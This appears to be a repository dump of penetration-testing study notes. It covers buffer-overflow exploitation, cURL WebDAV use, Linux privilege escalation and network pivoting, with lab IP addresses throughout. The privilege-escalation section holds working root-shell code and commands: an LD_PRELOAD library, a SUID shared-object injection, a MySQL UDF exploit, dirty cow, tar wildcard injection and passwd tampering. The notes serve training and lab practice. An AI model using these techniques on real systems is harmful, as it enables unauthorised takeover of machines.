├── Buffer Overflows.md ├── Curl.md ├── Linux Privilege Escalation.md ├── Password Dumping and Cracking.md ├── Pivoting.md ├── Reverse Shells.md ├── SNMP Cheatsheet.md ├── SQL injection Manual.md ├── WMIC Cheatsheet.md ├── Windows Registry.md ├── Wordpress Cheatsheet.md └── cheatsheet_gdb.md /Buffer Overflows.md: -------------------------------------------------------------------------------- 1 | # Buffer Overflows 2 | 3 | lets try to connect with simple python client 4 | we can also do with **nc** 5 | 6 | ```python 7 | import socket 8 | s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) 9 | s.connect(('10.10.129.253',1337)) 10 | msg = s.recv(2048).decode() 11 | print(msg) 12 | ``` 13 | 14 | now we get the output 15 | 16 | ``` 17 | Welcome to OSCP Vulnerable Server! Enter HELP for help. 18 | ``` 19 | 20 | ok now we need to send **HELP** and see whats output 21 | 22 | ```python 23 | 24 | import socket 25 | s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) 26 | s.connect(('10.10.129.253',1337)) 27 | msg = s.recv(2048).decode() 28 | print(msg) 29 | msg = 'HELP' 30 | s.send(msg.encode('raw_unicode_escape')) 31 | msg = s.recv(2048).decode() 32 | print(msg) 33 | s.close() 34 | ``` 35 | 36 | we get the output 37 | 38 | ``` 39 | Welcome to OSCP Vulnerable Server! Enter HELP for help. 40 | Valid Commands: 41 | HELP 42 | OVERFLOW1 [value] 43 | OVERFLOW2 [value] 44 | OVERFLOW3 [value] 45 | OVERFLOW4 [value] 46 | OVERFLOW5 [value] 47 | OVERFLOW6 [value] 48 | OVERFLOW7 [value] 49 | OVERFLOW8 [value] 50 | OVERFLOW9 [value] 51 | OVERFLOW10 [value] 52 | EXIT 53 | ``` 54 | 55 | --- 56 | 57 | ## Fuzzing Template 58 | 59 | i am fan of boofuzz (no offense to spike or sulley) 60 | this template can be used to fuzz instantly 61 | 62 | change ipaddress , port and at OVERFLOW1 according to your application 63 | ```python 64 | from boofuzz import * 65 | 66 | session = Session(target=Target(connection=SocketConnection('192.168.0.10',31337,proto='tcp'))) 67 | s_initialize("FUZZ") 68 | s_static("OVERFLOW1 ") 69 | s_string("AAAA") 70 | session.connect(s_get("FUZZ")) 71 | session.fuzz() 72 | ``` 73 | 74 | --- 75 | 76 | ## Pattern Generation 77 | 78 | Using **msf-pattern_create** 79 | ``` 80 | $ /usr/bin/msf-pattern_create -l 20 81 | Aa0Aa1Aa2Aa3Aa4Aa5Aa 82 | ``` 83 | 84 | Finding Offset using **msf-pattern_offset** 85 | ``` 86 | $ /usr/bin/msf-pattern_offset -q Aa3A 87 | [*] Exact match at offset 9 88 | ``` 89 | 90 | Using online website 91 | ``` 92 | https://zerosum0x0.blogspot.com/2016/11/overflow-exploit-pattern-generator.html 93 | ``` 94 | 95 | I also made a pattern_generator.py 96 | simple but efficient in searching any length bytes 97 | 98 | ```python 99 | import random 100 | 101 | data = ['A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z',\ 102 | 'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z',\ 103 | '1','2','3','4','5','6','7','8','9','0'] 104 | 105 | length = int(input("enter length of the pattern size ")) 106 | pattern = '' 107 | for i in range(length): 108 | pattern += data[random.randint(0,61)] 109 | 110 | #print("pattern generated") 111 | print(pattern) 112 | item = input("enter string to find offset ") 113 | #index1 = pattern.find(item) 114 | indexes = [] 115 | item_length = len(item) 116 | for i in range(0,len(pattern)): 117 | temp = pattern[i:i+item_length] 118 | if temp == item: 119 | indexes.append(i) 120 | for every in indexes: 121 | print(every) 122 | ``` 123 | 124 | --- 125 | 126 | ## Bad Character Detection 127 | 128 | generate all bytes using mona 129 | ``` 130 | !mona bytearray -b "\x00" 131 | ``` 132 | 133 | generate using python 134 | ```python 135 | for x in range(1, 256): 136 | print("\\x" + "{:02x}".format(x), end='') 137 | print() 138 | ``` 139 | 140 | comparing bytes from esp to file 141 | ``` 142 | !mona compare -f c:\mona\program\bytearray.bin -a esp_address 143 | ``` 144 | 145 | --- 146 | 147 | ## Finding JMP REGISTER 148 | 149 | using mona 150 | ``` 151 | !mona jmp -r register -cpb "\x00\x0a\x0d" 152 | 153 | !mona jmp -r esp -cpb "\x00\x0a\x0d" 154 | 155 | ``` 156 | 157 | using Immunity Debugger 158 | ``` 159 | Right click on CPU Pane > Search for > All commands in All Modules 160 | 161 | Enter JMP ESP 162 | 163 | ``` 164 | 165 | --- 166 | 167 | ## Setting Breakpoint at eip address 168 | 169 | do this and debug when ur shellcode doesnot execute 170 | 171 | ``` 172 | Right click on CPU Pane > Go to > Expression > put jmp esp address > Toggle Breakpoint 173 | ``` 174 | 175 | click the next button right next to run button 176 | 177 | --- 178 | 179 | ## Alternatives to JMP ESP 180 | 181 | when there is no jmp esp , we can try these alternatives 182 | 183 | **CALL ESP** 184 | ``` 185 | This is similar to jmp esp 186 | ``` 187 | 188 | **PUSH RET** 189 | ``` 190 | PUSH esp 191 | RET 192 | 193 | first instruction pushes esp address on to stack 194 | RET takes top of stack that is address of esp and places in eip 195 | ``` 196 | 197 | --- 198 | 199 | ## Tackling NULL Bytes 200 | if there are some junk or null bytes after eip and before esp 201 | like less than 8 bytes 202 | 203 | **POP POP RET** 204 | first pop operation takes content at esp and puts in a register 205 | another pop does the same 206 | ret will place esp content into eip 207 | we can search for these 208 | POP reg32 209 | POP reg32 210 | RET 211 | 212 | using mona 213 | ``` 214 | !mona pop pop ret 215 | ``` 216 | 217 | using Immunity 218 | ``` 219 | Right Click on CPU Pane > Search for > ALL SEQUENCES OF COMMANDS IN ALL MODULES > 220 | 221 | POP reg32 222 | POP reg32 223 | RET 224 | 225 | ``` 226 | 227 | **SHORT JMP** 228 | we can convert our assembly instructions to opcode 229 | and write opcode in esp instead of address 230 | go to this website and assemble instructions 231 | ``` 232 | https://defuse.ca/online-x86-assembler.htm 233 | ``` 234 | lets say we wanna jump 40 bytes 235 | ``` 236 | op code is e9 3c 00 00 00 237 | esp = '\x90\x90\x3c\xe9' 238 | ``` 239 | it will jump 40 bytes down 240 | 241 | i wrote a python script u can choose to jump forward or backward 242 | ```python 243 | n = int(input("Enter how many bytes you want to jump :")) 244 | direction = int(input("Enter which direction you want to jump 1.forward 2. backward")) 245 | 246 | if direction == 1: 247 | print("\\xeb\\{}".format(hex(n)[1:])) 248 | 249 | if direction == 2: 250 | temp = 256-n 251 | print("\\xeb\\{}".format(hex(temp))) 252 | ``` 253 | 254 | There are many ways to escape null or bad bytes 255 | practice and you will find more interesting ways -------------------------------------------------------------------------------- /Curl.md: -------------------------------------------------------------------------------- 1 | # cURL 2 | 3 | curl stands for commandline URL 4 | it can be used to get data , post data , move delete etc 5 | 6 | ## GET Request 7 | 8 | this is basic getting the webpage 9 | ``` 10 | curl https://example.com/webdav 11 | ``` 12 | 13 | ## DELETE files 14 | 15 | if we have delete access then we can delete file on webdav 16 | 17 | ``` 18 | curl -X DELETE https://example.com/webdav/file.txt 19 | ``` 20 | 21 | file.txt will be deleted 22 | 23 | ## PUT or uploading files 24 | 25 | we can upload to webdav using curl PUT request 26 | 27 | ``` 28 | curl -X PUT https://example.com/webdav -d @test.txt 29 | ``` 30 | -d represents data 31 | 32 | ## Create folder in WebDAV 33 | 34 | ``` 35 | curl -X MKCOL https://example.com/webdav/newfolder 36 | ``` 37 | 38 | ## Uploading file to folder 39 | 40 | ``` 41 | curl -T 'filename' 'https://example.com/webdav/newfolder/' 42 | ``` 43 | 44 | ## Authentication 45 | 46 | if we have username and password we can use those in our curl request 47 | 48 | ``` 49 | curl -u 'username:password' https://example.com/webdav --basic 50 | 51 | curl -u 'username:password' https://example.com/webdav --digest 52 | 53 | curl -u 'username:password' https://example.com/webdav --anyauth 54 | 55 | ``` 56 | 57 | ## MOVE files 58 | 59 | ``` 60 | curl -X MOVE 'Destination:https://example.com/webdav/newfilename' 'https://example.com/webdav/oldfile' 61 | ``` 62 | 63 | ## See Response code 64 | ``` 65 | curl -X GET https://example.com/webdav -sm '%{http_code}' 66 | ``` 67 | 68 | 69 | -------------------------------------------------------------------------------- /Linux Privilege Escalation.md: -------------------------------------------------------------------------------- 1 | # Linux Privilege Escalation 2 | 3 | Tags : 4 | 5 | ## Contents 6 | [Mysql Service as root](#MySQL-Service-as-root) 7 | 8 | [Hash Cracking](#Hash-Cracking) 9 | 10 | [Tmux Socket Sessions](#Tmux-Socket-Sessions) 11 | 12 | [PATH Variable Manipulation](#PATH-Variable-Manipulation) 13 | 14 | [Kernel Exploits](#Kernel-Exploits) 15 | 16 | [Juicy Files and Directories](#Juicy-Files-and-Directories) 17 | 18 | [Writable passwd or shadow](#Writable-passwd-or-shadow) 19 | 20 | [Users permissions](#Users-permissions) 21 | 22 | [Sudo Vulnerability](#Sudo-Vulnerability) 23 | 24 | [LD_PRELOAD env variable](#LD-PRELOAD-env-variable) 25 | 26 | [LD_LIBRARY_PATH](#LD_LIBRARY_PATH-env-variable) 27 | 28 | [Cap setuid capability](#Cap-setuid-capability) 29 | 30 | [Cron Jobs](#Cron-Jobs) 31 | 32 | [Tar wildcard injection](#Tar-wildcard-injection) 33 | 34 | [Python Module Injection](#Python-Module-Injection) 35 | 36 | [Shared Object Injection](#Shared-Object-Injection) 37 | 38 | [Nginx Logrotate CVE](#Nginx-Logrotate-CVE) 39 | 40 | [Chkrootkit 0.49 CVE](#Chkrootkit-0.49-CVE) 41 | 42 | [NFS Root Squashing](#NFS-Root-Squashing) 43 | 44 | [Disk Group](#Disk-Group) 45 | 46 | [LXD Group](#Disk-Group) 47 | 48 | [Docket Group](#Docker-Group) 49 | 50 | [Initctl Jobs](#Initctl-Jobs) 51 | 52 | ## MySQL Service as root 53 | 54 | if mysql service is running as root and we have root credentials then we can execute commands via **User-DefinedFunctions** 55 | 56 | this exploit works for mysql 4.x/5.0 57 | Download [here](https://www.exploit-db.com/download/1518) 58 | save it as raptor_udf2.c 59 | 60 | Now Compile into object and sharedobjects 61 | ```bash 62 | gcc -g -c raptor_udf2.c -fPIC 63 | gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc 64 | ``` 65 | 66 | then connect to mysql 67 | in that we create a new table and load this sharedobject into that table 68 | we then copy contents into original raptor_udf2.so file 69 | 70 | ```bash 71 | use mysql; 72 | create table foo(line blob); 73 | insert into foo values(load_file('/home/user/tools/mysql-udf/raptor_udf2.so')); 74 | select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so'; 75 | create function do_system returns integer soname 'raptor_udf2.so'; 76 | ``` 77 | 78 | then we can execute commands as arguments to our function 79 | ```bash 80 | select do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash'); 81 | ``` 82 | 83 | now we have copied bash into tmp and added s bit on 84 | so we can run that as root by default 85 | ``` 86 | /tmp/rootbash -p 87 | ``` 88 | 89 | 90 | ## Hash Cracking 91 | 92 | when user set weak password , it can be cracked with johntheripper 93 | password hashes are found in **/etc/shadow** file 94 | this file contents are generally cannot be readable by any user 95 | if incase normal user can read this file then we can try to bruteforce hashes 96 | copy hash into a file 97 | ``` 98 | ./john --format=sha512crypt -w=rockyou.txt hashfile 99 | ``` 100 | if the password is in rockyou.txt you will get password 101 | 102 | 103 | ## Tmux Socket Sessions 104 | 105 | tmux can be left open by root user or any other user 106 | using ps command we can verify on which socket tmux is running 107 | 108 | ``` 109 | ps -aux | grep tmux 110 | tmux -S /tmp/socket 111 | ``` 112 | you will get a tmux session 113 | 114 | 115 | ## VNC Sessions 116 | 117 | ## PATH Variable Manipulation 118 | 119 | we have binary and it executes another binary but it doesnot uses absolutepath it only uses relative path 120 | in that case we can write fake binary in that directory 121 | if the directory is not writable we can create fake binary in /tmp and can change PATH variable 122 | 123 | here we have binary and its source code 124 | if we dont have source code , we can apply strings on that binary 125 | ```c 126 | #include 127 | #include 128 | #include 129 | #include 130 | int main() { 131 | 132 | printf("checking if you are tom...\n"); 133 | FILE* f = popen("whoami", "r"); 134 | char user[80]; 135 | fgets(user, 80, f); 136 | printf("you are: %s\n", user); 137 | //printf("your euid is: %i\n", geteuid()); 138 | if (strncmp(user, "tom", 3) == 0) { 139 | printf("access granted.\n"); 140 | setuid(geteuid()); 141 | execlp("sh", "sh", (char *) 0); 142 | } 143 | } 144 | 145 | ``` 146 | 147 | we can see popen function and whoami binary is not full path 148 | popen function executes the binary specified and takes that binary's output into filestream 149 | and script checks if we are tom user then it drops root shell 150 | let's create a binary in /tmp named whoami 151 | 152 | ```bash 153 | touch /tmp/whoami 154 | echo "echo tom" > /tmp/whoami 155 | chmod +x /tmp/whoami 156 | ``` 157 | 158 | now we need to change PATH variable because by default rootshell binary takes from /bin 159 | 160 | ```bash 161 | export PATH=/tmp:$PATH 162 | ``` 163 | 164 | now run the rootshell binary and we get root shell 165 | 166 | ## Kernel Exploits 167 | 168 | type uname -a command to retrieve linux kernel version 169 | you can google this kernel number to find any kernel exploits 170 | 171 | we can use tools which will retrieve kernel number and find kernel exploits that might work 172 | those are 173 | 174 | [linux-exploit-suggester.sh](https://github.com/mzet-/linux-exploit-suggester/blob/master/linux-exploit-suggester.sh) 175 | 176 | [linux-exploit-suggester2.pl](https://github.com/jondonas/linux-exploit-suggester-2/blob/master/linux-exploit-suggester-2.pl) 177 | 178 | second script requires perl to be installed on linux , as most of distros comes perl by default we can use this perl script 179 | this perl script is lot more cleaner than first one 180 | 181 | 182 | ```bash 183 | TCM@debian:~/tools/linux-exploit-suggester$ perl linux-exploit-suggester-2.pl 184 | 185 | ############################# 186 | Linux Exploit Suggester 2 187 | ############################# 188 | 189 | Local Kernel: 2.6.32 190 | Searching 72 exploits... 191 | 192 | Possible Exploits 193 | [1] american-sign-language 194 | CVE-2010-4347 195 | Source: http://www.securityfocus.com/bid/45408 196 | [2] can_bcm 197 | CVE-2010-2959 198 | Source: http://www.exploit-db.com/exploits/14814 199 | [3] dirty_cow 200 | CVE-2016-5195 201 | Source: http://www.exploit-db.com/exploits/40616 202 | --snip-- 203 | ``` 204 | 205 | dirty cow is famous linux kernel exploit 206 | we can use that 207 | grab from [here](https://www.exploit-db.com/exploits/40839) 208 | 209 | ```bash 210 | TCM@debian:~/tools/dirtycow$ gcc -pthread c0w.c -o cow -lcrypt 211 | TCM@debian:~/tools/dirtycow$ ls 212 | c0w.c cow 213 | TCM@debian:~/tools/dirtycow$ ./cow 214 | ``` 215 | 216 | then type passwd 217 | ```bash 218 | TCM@debian:~/tools/dirtycow$ passwd 219 | root@debian:/home/user/tools/dirtycow# id 220 | uid=0(root) gid=1000(user) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(user) 221 | root@debian:/home/user/tools/dirtycow# whoami 222 | root 223 | ``` 224 | 225 | ## Juicy Files and Directories 226 | 227 | there are some directories you need to look for any juicy information 228 | ``` 229 | /opt/ 230 | /backup 231 | /var/backup 232 | readable .bash_history 233 | /mnt/ 234 | other user's ssh keys 235 | /user/.ssh/id_rsa 236 | webserver's configuration files 237 | /config.php 238 | ``` 239 | 240 | ## Writable passwd or shadow 241 | 242 | if passwd is writable we can add new user 243 | ```bash 244 | arrow@ideapad:~/tools/privesc$ mkpasswd -m sha512crypt arrow 245 | $6$GQaxR2lccvxiN$MJBxFbqAeuONoioX1sF2SwjmM9Ntf0fa4LkSl86YeVqHRz2QMid.d18e.mzr/ODprEXGrNHE16OSKyE/Yr5UG1 246 | ``` 247 | 248 | copy that hash and paste at end of passwd like this 249 | ``` 250 | arrow:$6$GQaxR2lccvxiN$MJBxFbqAeuONoioX1sF2SwjmM9Ntf0fa4LkSl86YeVqHRz2QMid.d18e.mzr/ODprEXGrNHE16OSKyE/Yr5UG1:0:0:/root:/bin/bash 251 | ``` 252 | 253 | 254 | ## Users permissions 255 | 256 | type `sudo -l` to list user's permissions 257 | if any binary we can run with NOPASSWD or as root with our password we can take advantage of that binary to get root shell 258 | 259 | ```bash 260 | sudo -l 261 | (root) NOPASSWD: /usr/bin/find 262 | sudo /usr/bin/find ./ -name myvpn.ovpn -exec /bin/bash -p \; 263 | we get root shell 264 | ``` 265 | 266 | for info on more binaries you can refer website called 267 | [GTFOBins](https://gtfobins.github.io/) 268 | 269 | ## Sudo Vulnerability 270 | 271 | after typing sudo -l if you get like !root then you can take advantage of this 272 | 273 | `(ALL, !root) /bin/bash` 274 | 275 | ```bash 276 | sudo -u#-1 /bin/bash 277 | will give u root shell 278 | ``` 279 | 280 | even in place of binbash if you have other binary you can do the same 281 | 282 | ## LD_PRELOAD env variable 283 | 284 | run sudo -l 285 | `env_reset, env_keep+=LD_PRELOAD` 286 | then if u see preserving the LD_PRELOAD variable then you can specify own .so file when running binary 287 | ld_preload variable holds .so files that are being loaded into memory and run before actual program runs 288 | 289 | ```c 290 | #include 291 | #include 292 | #include 293 | 294 | void _init() { 295 | unsetenv("LD_PRELOAD"); 296 | setgid(0); 297 | setuid(0); 298 | system("/bin/bash"); 299 | } 300 | ``` 301 | in the above code we are unsetting any values for LD_PRELOAD and then setting our user and group id as 0 (root's) and then executing bash 302 | 303 | compile this using gcc 304 | `gcc -fPIC -shared -nostartfiles x.c -o x.so` 305 | 306 | now put LD_PRELOAD env variable point to our shared object file and then run binary 307 | that shared object will load and run before executing our actual program 308 | ```bash 309 | TCM@debian:~$ sudo LD_PRELOAD=/home/user/x.so /usr/sbin/apache2 310 | root@debian:/home/user# 311 | ``` 312 | 313 | ## LD_LIBRARY_PATH env variable 314 | 315 | shared objects used by binary are fetched first from LD_LIBRARY_PATH if it was set any directory value 316 | so we can put our fake shared object file in /tmp and point LD_LIBRARY_PATH to /tmp and our sharedobject gets loaded and run 317 | 318 | 319 | ## Cap setuid capability 320 | 321 | running linpeas will reveal binaries with this capability 322 | but this command also can reveal 323 | ``` 324 | getcap -r / 2>/dev/null 325 | ``` 326 | 327 | if its python or perl go to gtfo bins and execute to pwn root shell 328 | 329 | ## Cron Jobs 330 | 331 | `cat /etc/crontab` contains cron jobs 332 | ls /etc/cron* also can contain cron jobs 333 | if you didnot see any , run linpeas it may find 334 | 335 | ```bash 336 | TCM@debian:~$ cat /etc/crontab 337 | # /etc/crontab: system-wide crontab 338 | # Unlike any other crontab you don't have to run the `crontab' 339 | # command to install the new version when you edit this file 340 | # and files in /etc/cron.d. These files also have username fields, 341 | # that none of the other crontabs do. 342 | 343 | SHELL=/bin/sh 344 | PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin 345 | 346 | 347 | * * * * * root overwrite.sh 348 | * * * * * root /usr/local/bin/compress.sh 349 | ``` 350 | 351 | we have overwrite.sh script which is run by root user every minute 352 | and see PATH variable and starting path is /home/user 353 | so we can create a fake overwrite.sh 354 | 355 | ```bash 356 | echo "id > /tmp/test" > overwrite.sh 357 | chmod +x overwrite.sh 358 | ``` 359 | 360 | after one minute you should see a file test in /tmp with root user info 361 | then put reverse shell in that overwrite.sh and get root shell 362 | 363 | 364 | ## Tar wildcard injection 365 | 366 | tar binary have a option to backup all files in directory using asterisk * 367 | ``` 368 | cd /home/user 369 | tar czf /tmp/backup.tar.gz * 370 | ``` 371 | 372 | its backing up all files in /home/user to /tmp 373 | we can create two files with the names 374 | --checkpoint=1 and --checkpoint-action=exec=sh shell.sh 375 | in the /home/user 376 | when tar is being executed it takes all the file names including our checkpoints 377 | when it hit a checkpoint 1 it executes an action which is shell.sh 378 | put a reverse shell in shell.sh 379 | ```bash 380 | cd /home/user 381 | echo "" > "--checkpoint=1" 382 | echo "" > "--checkpoint-action=exec=sh shell.sh" 383 | echo "reverse shell" > shell.sh 384 | ``` 385 | 386 | 387 | ## Python Module Injection 388 | 389 | when there is python script run by cron job as root 390 | see what modules it imports 391 | say it imports os module 392 | and the python script is in say /home/arrow 393 | if you can write to that directory then create a os.py file in the same folder as of that cronjob script 394 | then put a python reverse shell in it 395 | whenever cron job executes it script imports this os.py file and executes it 396 | if that directory is not writable then check permissions in 397 | ``` 398 | /usr/lib/python3/os.py 399 | or 400 | /usr/lib/python2/os.py 401 | ``` 402 | 403 | if thats writable then add reverse shell to that file 404 | ``` 405 | cd /home/arrow 406 | echo "reverse shell " > os.py 407 | ``` 408 | 409 | 410 | ## Shared Object Injection 411 | 412 | we can find binaries using find command 413 | ``` 414 | find / -type f -perm -04000 -ls 2>/dev/null 415 | ``` 416 | 417 | in our case its /usr/local/bin/suid-so 418 | to run functions in .so file this binary should open it or access it 419 | we can use strace to see what systemcalls its using 420 | ```bash 421 | TCM@debian:~$ strace /usr/local/bin/suid-so 2>&1 | grep -i -E "open|access|no such file" 422 | access("/etc/suid-debug", F_OK) = -1 ENOENT (No such file or directory) 423 | access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory) 424 | access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory) 425 | open("/etc/ld.so.cache", O_RDONLY) = 3 426 | access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory) 427 | open("/lib/libdl.so.2", O_RDONLY) = 3 428 | access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory) 429 | open("/usr/lib/libstdc++.so.6", O_RDONLY) = 3 430 | access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory) 431 | open("/lib/libm.so.6", O_RDONLY) = 3 432 | access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory) 433 | open("/lib/libgcc_s.so.1", O_RDONLY) = 3 434 | access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory) 435 | open("/lib/libc.so.6", O_RDONLY) = 3 436 | open("/home/user/.config/libcalc.so", O_RDONLY) = -1 ENOENT (No such file or directory) 437 | ``` 438 | its using a .so file from /home/user/.config directory and its name is libcalc.so 439 | create a file in that directory with that name 440 | put this c code into that libcacl.c 441 | ```c 442 | #include 443 | #include 444 | 445 | static void inject() __attribute__((constructor)); 446 | 447 | void inject() { 448 | system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p"); 449 | } 450 | ``` 451 | 452 | now compile with gcc 453 | `gcc libcalc.c -shared -fPIC -o libcalc.so` 454 | 455 | now run that binary 456 | ```bash 457 | TCM@debian:~/.config$ gcc libcalc.c -shared -fPIC -o libcalc.so 458 | TCM@debian:~/.config$ /usr/local/bin/suid-so 459 | Calculating something, please wait... 460 | bash-4.1# whoami 461 | root 462 | ``` 463 | 464 | 465 | ## Nginx Logrotate CVE 466 | 467 | this works only when we are www-data and <=1.6.2 468 | ```bash 469 | www-data@debian:/home/user/tools/nginx$ dpkg -l | grep nginx 470 | ii nginx-common 1.6.2-5+deb8u2~bpo70+1 small, powerful, scalable web/proxy server - common files 471 | ii nginx-full 1.6.2-5+deb8u2~bpo70+1 nginx web/proxy server (standard version) 472 | ``` 473 | 474 | download this shellscript and execute it with /var/log/nginx/error.log as argument 475 | now we need to wait until logrotate occurs 476 | we can manually trigger this with root user 477 | or if there is any cronjob triggering this 478 | 479 | ```bash 480 | ./nginxed-root.sh /var/log/nginx/error.log 481 | and in other root shell 482 | invoke-rc.d nginx rotate >/dev/null 2>&1 483 | ``` 484 | and we get the rootshell 485 | 486 | 487 | ## Chkrootkit 0.49 CVE 488 | 489 | chkrootkit has local privesc cve 490 | put binary named 'update' in /tmp 491 | put reverse shell in update and chmod +x it 492 | 493 | whenever cron job executes chkrootkit it executes /tmp/update 494 | 495 | ## NFS Root Squashing 496 | 497 | when a nfs share has no_root_squash this means that root user on client can access that share with root privileges 498 | type cat /etc/exports on victim box and u can see /tmp with no_root_squash 499 | ``` 500 | showmount -e 10.10.121.162 501 | Export list for 10.10.121.162: 502 | /tmp * 503 | ``` 504 | 505 | switch to root user on kali and 506 | lets mount in /tmp/share1 507 | ```bash 508 | mount -o rw,vers=2 10.10.121.162:/tmp /tmp/share1 509 | ``` 510 | 511 | now create a binary and put a reverse shell in it 512 | ```bash 513 | touch /tmp/share1/shell 514 | echo "reverse shell" > /tmp/share1/shell 515 | chmod +s /tmp/share1/shell 516 | ``` 517 | 518 | now from victim box with low privileged user 519 | execute /tmp/shell 520 | we get root shell 521 | 522 | 523 | ## Disk Group 524 | 525 | use id command to see what groups we are in 526 | if we are member of disk group we can try to read contents as root user 527 | we can use debugfs on the corresponding /dev/sda 528 | in my case its /dev/sda6 529 | generally its /dev/sda1 530 | ``` 531 | └─$ debugfs /dev/sda6 532 | debugfs 1.45.5 (07-Jan-2020) 533 | debugfs: cat /home/arrow/flag.txt 534 | u got it 535 | debugfs: cat /root/.ssh/id_rsa 536 | u get the private key 537 | ``` 538 | 539 | ## LXD Group 540 | 541 | 542 | -------------------------------------------------------------------------------- /Password Dumping and Cracking.md: -------------------------------------------------------------------------------- 1 | # Password Dumping and Cracking 2 | 3 | Tags : #pwdump7 4 | 5 | -------------------------------------------------------------------------------- /Pivoting.md: -------------------------------------------------------------------------------- 1 | # Pivoting 2 | 3 | Tags : #portforwarding #ssh #sshuttle #chisel #metasploit #autoroute #routeadd #socks #socks5 #socks4a 4 | 5 | Before starting you need to enable port forwarding option in your kali linux box else no method will work 6 | 7 | to do that edit ip_forward file and put 1 8 | this enables to act our kali as router 9 | 10 | ``` 11 | sudo echo 1 > /proc/sys/net/ipv4/ip_forward 12 | ``` 13 | 14 | --- 15 | 16 | if you want full explanation with theory i made these videos on yt 17 | 18 | SSH Tunneling 19 | ``` 20 | https://www.youtube.com/watch?v=2FRn-M7LOj4 21 | ``` 22 | 23 | Pivoting with Metasploit 24 | ``` 25 | https://www.youtube.com/watch?v=I3N2_arY9Kg 26 | ``` 27 | 28 | Pivoting with Chisel 29 | ``` 30 | https://www.youtube.com/watch?v=srUUUkcYEwg 31 | ``` 32 | 33 | --- 34 | 35 | ## SSH Tunneling 36 | 37 | This method requires ssh login credentials of the victim machine 38 | 39 | ### Lab Setup 40 | 41 | kali linux - 192.168.2.129 42 | 43 | machine1 - 192.168.2.128 44 | 192.168.3.128 45 | 46 | machine2 - 192.168.3.129 47 | 48 | 49 | kali linux can ping machine1 but cannot ping machine2 50 | machine1 have another adapter that connects to machine2 51 | machine1 can ping machine2 using that adapter 52 | 53 | we can forward the data from our kali to machine3 using ssh 54 | 55 | 56 | ### Local Port Forwarding 57 | 58 | we forward our kali's port to machine3 59 | 60 | ``` 61 | $ ssh -L 4444:192.168.3.129:80 msfadmin@192.168.2.128 62 | ``` 63 | 64 | now data coming from our machine's port 4444 to machine2 will be forwarded to machine3's port 80 65 | 66 | This is like one-to-one port connection 67 | 68 | kali:4444 -> machine2 -> machine3:80 69 | 70 | 71 | ### Dynamic Port Forwarding with SOCKS 72 | 73 | in previous local port forwarding we can forward from one port to one ip's one port only 74 | but with dynamic port forwarding , the machine2 will forward data according to what we send 75 | 76 | ``` 77 | ssh -D 4444 msfadmin@192.168.2.128 78 | ``` 79 | 80 | now we have been forwarded 81 | we need to edit **proxychains4.conf** 82 | with proxychains we throw all our data at port 4444 83 | it will be forwarded to destination via machine2 84 | 85 | add this line at the end 86 | ``` 87 | socks5 127.0.0.1 4444 88 | ``` 89 | 90 | now u can do nmap scan on machine3 91 | or any command but include proxychains before that command 92 | 93 | ``` 94 | $ proxychains nmap -p80 -Pn -sV 192.168.3.129 95 | [proxychains] config file found: /etc/proxychains4.conf 96 | [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 97 | [proxychains] DLL init: proxychains-ng 4.14 98 | Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. 99 | Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-30 10:15 EDT 100 | [proxychains] Strict chain ... 127.0.0.1:4444 ... 192.168.3.129:80 ... OK 101 | [proxychains] Strict chain ... 127.0.0.1:4444 ... 192.168.3.129:80 ... OK 102 | [proxychains] Strict chain ... 127.0.0.1:4444 ... 192.168.3.129:80 ... OK 103 | [proxychains] Strict chain ... 127.0.0.1:4444 ... 192.168.3.129:80 ... OK 104 | [proxychains] Strict chain ... 127.0.0.1:4444 ... 192.168.3.129:80 ... OK 105 | [proxychains] Strict chain ... 127.0.0.1:4444 ... 192.168.3.129:80 ... OK 106 | [proxychains] Strict chain ... 127.0.0.1:4444 ... 192.168.3.129:80 ... OK 107 | [proxychains] Strict chain ... 127.0.0.1:4444 ... 192.168.3.129:80 ... OK 108 | [proxychains] Strict chain ... 127.0.0.1:4444 ... 192.168.3.129:80 ... OK 109 | Nmap scan report for 192.168.3.129 110 | Host is up (0.0041s latency). 111 | 112 | PORT STATE SERVICE VERSION 113 | 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2) 114 | ``` 115 | 116 | we can see we scanned successfully 117 | you can also see there is **Strict Chain** 118 | ``` 119 | [proxychains] Strict chain ... 127.0.0.1:4444 ... 192.168.3.129:80 ... OK 120 | ``` 121 | that shows our connection 122 | 123 | kali:4444 -> machine2 -> any_machine_it_can_scan 124 | 125 | kali:4444 -> machine2 -> machine3:anyport 126 | 127 | if you want to open the machine3 port 80 on browser 128 | then go to settings > proxy > put the proxy as 127.0.0.1 4444 129 | choose socks5 130 | 131 | **Limitations** : you need ssh credentials or private key 132 | 133 | --- 134 | 135 | ## Sshuttle 136 | 137 | sshuttle is very easy to use and it creates vpn network for all the machines machine2 connected to 138 | its similar to dynamic port forwarding 139 | 140 | sshuttle -r username@machine1 subnettoadd 141 | 142 | ``` 143 | $ sudo sshuttle -r msfadmin@192.168.2.128 192.168.3.1/24 144 | The authenticity of host '192.168.2.128 (192.168.2.128)' can't be established. 145 | RSA key fingerprint is SHA256:BQHm5EoHX9GCiOLuVscegPXLQOsuPs+E9d/rrJB84rk. 146 | Are you sure you want to continue connecting 